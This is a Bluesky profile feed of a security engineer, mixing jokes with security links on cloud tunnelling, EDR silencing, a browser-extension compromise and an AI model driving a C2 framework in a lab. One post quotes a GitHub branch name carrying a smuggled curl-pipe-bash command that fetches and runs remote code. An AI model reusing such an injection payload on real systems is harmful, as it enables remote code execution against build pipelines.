bruno's Avatar

bruno

@0xbruno.bsky.social

application & cloud security stuff | philosophy, chess, weight lifting, and whiskey enjoyer

71 Followers  |  309 Following  |  31 Posts  |  Joined: 22.10.2024  |  1.7445

Latest posts by 0xbruno.bsky.social on Bluesky

SSH Tunneling over SSM Session Manager During my day job, I was assisting a developer remotely develop on an EC2 instance using the VSCode extension β€œRemote - SSH”. As a Security Engineerβ„’, I would prefer not to open any SSH ports to the i...

SOCKS over SSH over AWS SSM Session Manager

0xbruno.dev/posts/cloud/...

30.07.2025 04:13 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

✨ vibe coded malware ✨

11.04.2025 18:03 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Pentester = almost a hacker

31.03.2025 20:01 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Mythic MCP - Claude Sonnet driving Mythic (Apollo)
YouTube video by Adam Chester Mythic MCP - Claude Sonnet driving Mythic (Apollo)

On PTO and bored, so playing around with MCP by exposing Mythic APIs to Claude and seeing what the result. Attempting to have it emulate threat actors while operating Apollo in a lab... would make a good sparring partner :D www.youtube.com/watch?v=ZooT...

20.03.2025 22:24 β€” πŸ‘ 20    πŸ” 6    πŸ’¬ 1    πŸ“Œ 0

I’m assuming if an Entra ID tenant has Certificate Based Authentication enabled and the CAs trusted, you could pivot from on prem ADCS issues like ESC1 to the cloud ? πŸ€”

12.03.2025 21:12 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Preview
GitHub - alufers/mitmproxy2swagger: Automagically reverse-engineer REST APIs via capturing traffic Automagically reverse-engineer REST APIs via capturing traffic - alufers/mitmproxy2swagger

Wow, how did I not use this yet?! github.com/alufers/mitm...

06.01.2025 16:21 β€” πŸ‘ 19    πŸ” 5    πŸ’¬ 2    πŸ“Œ 0
Preview
EDR Silencer and Beyond: Exploring Methods to Block EDR Communicationβ€Š-β€ŠPartΒ 2 Alternative methods for EDR Silencers for blocking EDR communication to disable defenses.

[NEW BLOG]
EDR Silencer and Beyond: Exploring Methods to Block EDR Communication - Part 2

In collaboration with
@fabian.bader.cloud


academy.bluraven.io/blog/edr-sil...

#redteam

01.12.2024 17:32 β€” πŸ‘ 18    πŸ” 6    πŸ’¬ 1    πŸ“Œ 0
Preview
EDR Silencer and Beyond: Exploring Methods to Block EDR Communicationβ€Š-β€ŠPartΒ 2 Alternative methods for EDR Silencers for blocking EDR communication to disable defenses.

cool seeing people I look up to talk more intelligently about the EDR silencing techniques

I talked about Hosts file and a local bring-your-own HTTP CONNECT β€œfirewall” sinkhole back in November

0xbruno.dev/posts/resear...

academy.bluraven.io/blog/edr-sil...

@cyb3rmonk.bsky.social

02.01.2025 18:39 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Preview
Breaking: Cyberhaven Chrome Extension Compromised in Holiday Attack Campaign An attacker successfully phished a Cyberhaven employee, gained access to Chrome Web Store admin credentials, published a malicious version of the extension

An attacker successfully phished a Cyberhaven employee.

They gained access to their Chrome Web Store admin credentials and published a malicious version of the Cyberhaven extension.

Read my full writeup here:

www.vulnu.com/p/breaking-c...

Thanks @jaimeblascob.bsky.social and @johntuckner.me

27.12.2024 03:20 β€” πŸ‘ 40    πŸ” 17    πŸ’¬ 0    πŸ“Œ 0

when you have to push a remediation for a dumb security bug for compliance and devs look at you diff

27.12.2024 02:12 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image 27.12.2024 02:08 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 1
Post image 25.12.2024 01:19 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image

The struggle is real.

24.12.2024 16:24 β€” πŸ‘ 8237    πŸ” 1972    πŸ’¬ 79    πŸ“Œ 247

At this pace security appliances getting popped more than other software πŸ˜…

22.12.2024 23:33 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Wonder who’s gonna be the Docker and k8s of agentic AI and orchestration. Think infosec will probably pivot to abusing the orchestration flows and architecture of agentic AI. Essentially adding an abstraction layer but we’ll still need knowledge of the underlying systems

20.12.2024 19:51 β€” πŸ‘ 2    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
8 Fav Bugs of 2024, Farewell Joel, Hello Shift - Cursor of Hacking (Ep. 100)
YouTube video by Critical Thinking - Bug Bounty Podcast 8 Fav Bugs of 2024, Farewell Joel, Hello Shift - Cursor of Hacking (Ep. 100)

It was talked about here first around the 7:30 mark. So totally not my bug. I reported to MSRC anyways since I couldn’t find anything else on this topic. I’ll blog after they respond.

youtu.be/ANYtLQrT-F0?...

20.12.2024 17:35 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0
Post image

☹️

20.12.2024 14:58 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Proton Services Status Welcome to Proton Services's home for real-time and historical data on system performance.

protonmail is down and their status page doesn’t reflect any errors >:(

status.proton.me

17.12.2024 22:36 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image

pentesters when they remember they left an unprotected webshell on an engagement months ago

12.12.2024 18:41 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
A simple black and white cartoon illustration showing a stylized representation of "ALL MODERN DIGITAL INFRASTRUCTURE" as a tower-like structure made of various rectangular blocks and components. Each component and layer of the structure is labeled with the word "backdoor" multiple times, suggesting widespread security vulnerabilities in digital systems. The illustration uses a minimalist style with basic geometric shapes and text annotations connected by lines pointing to different parts of the structure.

A simple black and white cartoon illustration showing a stylized representation of "ALL MODERN DIGITAL INFRASTRUCTURE" as a tower-like structure made of various rectangular blocks and components. Each component and layer of the structure is labeled with the word "backdoor" multiple times, suggesting widespread security vulnerabilities in digital systems. The illustration uses a minimalist style with basic geometric shapes and text annotations connected by lines pointing to different parts of the structure.

A diagram from Kaspersky showing the Operation Triangulation attack chain with neon green icons and text connected by dotted arrows. The chain begins with an β€œAttackers iMessage account” and progresses through multiple stages including PDF file, TrueType font exploit, ROP/JOP, NSExpression, bplist, and other technical components. Various CVE numbers are listed, including CVE-2023-41990, CVE-2023-32434, and CVE-2023-38606. The chain culminates in malware deployment through multiple exploitation steps involving Safari, kernel exploits, and validators.

A diagram from Kaspersky showing the Operation Triangulation attack chain with neon green icons and text connected by dotted arrows. The chain begins with an β€œAttackers iMessage account” and progresses through multiple stages including PDF file, TrueType font exploit, ROP/JOP, NSExpression, bplist, and other technical components. Various CVE numbers are listed, including CVE-2023-41990, CVE-2023-32434, and CVE-2023-38606. The chain culminates in malware deployment through multiple exploitation steps involving Safari, kernel exploits, and validators.

blunt versus beauty

09.12.2024 17:01 β€” πŸ‘ 12    πŸ” 1    πŸ’¬ 0    πŸ“Œ 1

ethernet? you mean the wifi cable

09.12.2024 17:01 β€” πŸ‘ 949    πŸ” 142    πŸ’¬ 37    πŸ“Œ 18

getting to work with people much smarter than you is such an underrated benefit

06.12.2024 23:44 β€” πŸ‘ 1    πŸ” 1    πŸ’¬ 0    πŸ“Œ 1
Preview
GitHub - 0xBruno/Get-AzureContainerAppEnvVars: get env vars for azure container apps for easy auditing of sensitive information get env vars for azure container apps for easy auditing of sensitive information - 0xBruno/Get-AzureContainerAppEnvVars

find those sweet creds in azure container app env vars

github.com/0xBruno/Get-...

06.12.2024 23:10 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

absolutely incredible attack vector

06.12.2024 03:27 β€” πŸ‘ 969    πŸ” 264    πŸ’¬ 17    πŸ“Œ 53
Post image 05.12.2024 23:58 β€” πŸ‘ 10603    πŸ” 1582    πŸ’¬ 105    πŸ“Œ 43

reading Fear and Trembling by Kierkegaard hoping for some deep insights. summary is β€œjust trust me bro” -god

04.12.2024 00:41 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Definitely the internet but seems especially prevalent in infosec. One day natsec expert the next niche geopolitical expert. Meanwhile their org still has admin panels facing the web without mfa πŸ˜΅β€πŸ’«

04.12.2024 00:40 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image

Was Dostoevsky a time traveler?

01.12.2024 10:35 β€” πŸ‘ 376    πŸ” 75    πŸ’¬ 17    πŸ“Œ 0
Post image 30.11.2024 15:06 β€” πŸ‘ 37    πŸ” 12    πŸ’¬ 2    πŸ“Œ 0

truly one of the skeets of all time

29.11.2024 03:37 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

@0xbruno is following 20 prominent accounts